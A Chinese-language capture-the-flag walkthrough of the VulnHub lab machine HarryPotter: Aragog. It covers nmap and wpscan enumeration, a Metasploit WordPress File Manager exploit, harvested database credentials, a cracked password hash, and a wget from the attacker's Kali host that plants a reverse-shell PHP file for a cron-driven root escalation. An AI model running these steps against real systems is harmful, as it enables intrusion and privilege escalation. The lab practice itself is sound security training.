vulnhub之 HarryPotter: Aragog (1.0.2)

靶机ip：192.168.181.145

kali ip: 192.168.181.129

首先进行ip扫描

打开网页进行查看

 查看开启哪些端口

nmap -sC -sV 192.168.181.145 --min-rate=2000 -d

 对目录进行扫描

 打开/blog页面

 发现notice无法进行跳转，修改/etc/hosts文件

 然后在kali打开

 用wpscan进行扫描

 

 发现有File Manager的漏洞于是打开msfcondole

 使用第二个,并进行相应的配置

 运行，可以获得shell

 

 python3 -c 'import pty;pty.spawn("/bin/bash")'

可以获得shell

 d98发现了一个bese64的编码的一段文字

这是翻译后的结果：1: RidDlE's DiAry dEstroYed By haRry in chaMbEr of SeCrets，翻译为 1：里德尔的日记在《密室》中被哈利毁掉

于是我们查找所有带有wordpress的目录名

find / -type d -name "wordpress" 2>/dev/null

 我们查看到了所有数据库用户名和密码

define('DB_NAME', 'wordpress');
define('DB_USER', 'root');
define('DB_PASSWORD', 'mySecr3tPass');
define('DB_HOST', 'localhost');
define('DB_COLLATE', 'utf8_general_ci');
define('WP_CONTENT_DIR', '/usr/share/wordpress/wp-content');

于是进行爆破

爆破失败

我们进入到mysql，上面给了我们用户名和密码

在wordpress找到了密码$P$BYdTic1NGSb8hJbpVEMiJaAiNJDHtc.

select * from wp_users

对其进行MD5解码

password123

 

 于是进行ssh登录

登录成功

进行提权

看看能否使用sudo提权

find / -perm -u=s -type f 2>/dev/null

没有可以利用的

于是查看是否有脚本

find / -name "*back*"

 发现一个备份文件，于是进行查看

他告诉我们要在tmp下创建一个upload，获取权限

在kali端开启web服务

 wget http://192.168.181.129:8888/11.php

 将php文件下载到/tmp下

 在kali端进行监听

 

 稍等片刻后可以获得root权限

 于是获得最终的flag